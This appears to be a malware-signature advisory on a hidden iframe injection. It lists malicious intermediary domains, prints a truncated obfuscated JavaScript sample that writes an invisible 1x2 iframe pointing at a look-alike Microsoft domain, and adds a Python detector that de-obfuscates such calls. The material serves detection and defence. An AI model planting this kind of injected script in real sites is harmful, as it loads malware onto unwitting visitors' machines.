Description:
We detected an iframe injection that uses JavaScript to hide its presence. It is a common form of malware injection, and we are seeing multiple domains being used as intermediaries, including:
microsof.cn
trughtsa.com
updatedate.cn
And a few other domains. The injected iframe is used to load malware from external web sites while not being visible to the user.
Affecting: Any web site (no specific CMS targeted).
Malware dump (sample of malware):
<script>document.write ("<"+ 'if'+' '+'ra'+''+"me"+' sr'+"c="ht"+'t'+"p:"+''+"/"+''+'/mic'+"roso"+"tf"+''+'.c'+''+"n"+'/'+"" wid"+' '+"th=1 h"+"eigh"+''+'t'+"="+"2>/i"+''+"fr"+"a"+''+""+''+"me"+'>');</script><s...
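A defender-side check for the pattern in the sample above, added here as an example and not part of the original signature: it folds the string concatenation inside `document.write(...)` back into one string and reports iframes whose width or height is only a few pixels. The function names, the `max_px` threshold and the `example.invalid` sample input are assumptions constructed for illustration.

```python
import re

# Argument of document.write(...); assumes no ");" occurs inside a string literal.
_CALL = re.compile(r"document\.write(?:ln)?\s*\((.*?)\)\s*;", re.S | re.I)
_LITERAL = re.compile(r"""(['"])(.*?)\1""", re.S)   # one quoted literal, may be empty
_PLUS = re.compile(r"\s*\+\s*")
_IFRAME = re.compile(r"<iframe\b[^>]*>", re.I)
_ATTR = re.compile(r"""(\w+)\s*=\s*["']?([^\s"'>]+)""")

# Constructed sample: one obfuscated 1x2 iframe and one ordinary visible embed.
SAMPLE = (
    '''<script>document.write("<"+'if'+'ra'+"me"+' sr'+"c=ht"+'tp:'+"//"+'''
    '''"malware.example.invalid/ wid"+"th=1 h"+"eigh"+'t'+"=2></i"+"fr"+"ame>");</script>\n'''
    '''<script>document.write("<iframe src=https://video.example.invalid/embed "'''
    ''' + "width=640 height=360></iframe>");</script>'''
)


def fold_concat(expr):
    """Join 'a'+"b"+... into one string; None if expr is not pure literal concatenation."""
    expr, pos, parts = expr.strip(), 0, []
    while pos < len(expr):
        lit = _LITERAL.match(expr, pos)
        if not lit:
            return None          # variable or function call: not handled here
        parts.append(lit.group(2))
        pos = lit.end()
        plus = _PLUS.match(expr, pos)
        if plus:
            pos = plus.end()
        elif pos != len(expr):
            return None          # literals not joined by '+'
    return "".join(parts)


def hidden_iframes(source, max_px=2):
    """Return (src, width, height) for each document.write iframe with a tiny dimension."""
    found = []
    for call in _CALL.finditer(source):
        html = fold_concat(call.group(1))
        for tag in _IFRAME.finditer(html or ""):
            a = {k.lower(): v for k, v in _ATTR.findall(tag.group(0))}
            dims = [a.get("width"), a.get("height")]
            if any(d and d.isdigit() and int(d) <= max_px for d in dims):
                found.append((a.get("src"), a.get("width"), a.get("height")))
    return found


if __name__ == "__main__":
    print(hidden_iframes(SAMPLE))
```

A plain-text search for `<iframe` misses this sample because the tag name never appears contiguously in the file; the fold step is what makes the tag visible to the check.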